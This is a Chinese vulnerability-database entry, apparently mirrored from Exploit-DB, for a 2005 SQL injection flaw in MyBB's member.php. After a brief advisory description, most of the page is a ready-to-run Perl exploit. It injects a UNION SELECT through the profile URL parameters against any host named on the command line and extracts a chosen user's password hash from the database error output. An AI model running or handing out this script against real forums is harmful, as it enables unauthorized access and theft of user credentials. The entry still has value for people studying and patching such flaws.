MyBB – ‘member.php’ SQL Injection

MyBB – ‘member.php’ SQL Injection

漏洞ID 1055360 漏洞类型
发布时间 2005-08-29 更新时间 2005-08-29
图片[1]-MyBB – ‘member.php’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-MyBB – ‘member.php’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26204
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14684/info

MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

#!/usr/bin/perl -w
use LWP::Simple;
## Vitem ##
        if(!$ARGV[0]){
                print "############# MyBB Member.php SQL Injection ##############n";
                print "##                Coded By               #n";
                print "##################################################  ########n";
                print "## [+] Bug By W7ED  - W7ED[at]hotmail.com #n";
                print "##################################################  ########n";
                print "#           Exmp:- perl file.pl mybb.net /mybb userid    #n";
                print "##################################################  ########n";
                exit;
        }
###########

my $host = 'http://'.$ARGV[0];

## User ID ##
        if(!$ARGV[1]){
                $ARGV[1] = 1;
        }
#############

my $userid = $ARGV[1];

print "[*] Trying $hostn";

## Forum Path ##
        if(!$ARGV[2]){
                $ARGV[2] = '/';
        }
################

$url = "$ARGV[2]/member.php?action=profile&uid=lastposter&fid=-1,') UNION SELECT
password,password,password,password,password,passw  ord,password,password,password,password,password,p
assword,password,password,password,password,passwo  rd,password,password,password,password,password,pa
ssword,password,password,password,password,passwor  d,password,password,password,password,password,pas  sword
FROM users WHERE uid=$userid/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $hostn";
        $page =~ m/mySQL error: 1054<br>Unknown column '(.*?)'/ && print "[+] User ID Is $userid And Hash Is :
$1n";
print "[-] Unable to retrieve Hashn" if(!$1);

相关推荐: PHPRank Administrator Password Plain Text Storage Vulnerability

PHPRank Administrator Password Plain Text Storage Vulnerability 漏洞ID 1101397 漏洞类型 Design Error 发布时间 2002-10-10 更新时间 2002-10-10 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享